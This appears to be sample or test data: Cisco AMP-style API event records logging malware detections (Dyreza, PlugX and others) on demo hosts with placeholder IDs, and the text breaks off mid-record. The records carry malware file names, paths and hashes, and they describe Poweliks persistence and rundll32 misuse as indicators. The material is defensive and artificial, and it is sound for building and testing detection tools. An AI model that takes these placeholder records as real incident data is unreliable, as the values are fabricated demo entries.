-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256739374006000,"timestamp":1610705312,"timestamp_nanoseconds":619000000,"date":"2021-01-15T10:08:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256739374006323","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256687834399000,"timestamp":1610705300,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:08:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256687834398770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256636294791000,"timestamp":1610705288,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:08:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256636294791217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666347035918000,"timestamp":1610705286,"timestamp_nanoseconds":559000000,"date":"2021-01-15T10:08:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666347035918338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739226271700,"timestamp":1610705284,"timestamp_nanoseconds":226259000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Poweliks is a fileless click-fraud malware variant which resides within the registry. It maintains persistence by creating a registry key that makes use of rundll32 to execute javascript code to read Powershell from the Windows registry, which subsequently executes portable executable code in memory.","short_description":"W32.PoweliksPersistence.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1521237739190653000,"timestamp":1610705284,"timestamp_nanoseconds":190644000,"date":"2021-01-15T10:08:04+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705284,"start_date":"2021-01-15T10:08:04+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The rundll32 application is designed to run code present in DLLs. There is however a case where it can also be used in the same way as MSHTA to execute JavaScript code on the command-line.","short_description":"W32.rundll32RunHTMLApplication.ioc"},"file":{"disposition":"Clean","file_name":"rundll32.exe","file_path":"/C:/Windows/system32/rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666334151016000,"timestamp":1610705283,"timestamp_nanoseconds":977000000,"date":"2021-01-15T10:08:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.B1380FD95B-100.SBX.TG","detection_id":"6533666334151016449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":3180,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256584755184000,"timestamp":1610705276,"timestamp_nanoseconds":957000000,"date":"2021-01-15T10:07:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256584755183664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709202491408000,"timestamp":1610705270,"timestamp_nanoseconds":802000000,"date":"2021-01-15T10:07:50+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209764771561000,"timestamp":1610705269,"timestamp_nanoseconds":265000000,"date":"2021-01-15T10:07:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209764771561497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256537510543000,"timestamp":1610705265,"timestamp_nanoseconds":319000000,"date":"2021-01-15T10:07:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256537510543407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":187000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841155","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55722,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841158","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55725,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841157","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55724,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841156","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55723,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841154","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55721,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333324762873857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55720,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":912000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960835","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":1428,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":162000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960834","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX1\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3596,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907648182026000,"timestamp":1610705261,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:07:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907648182026241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John 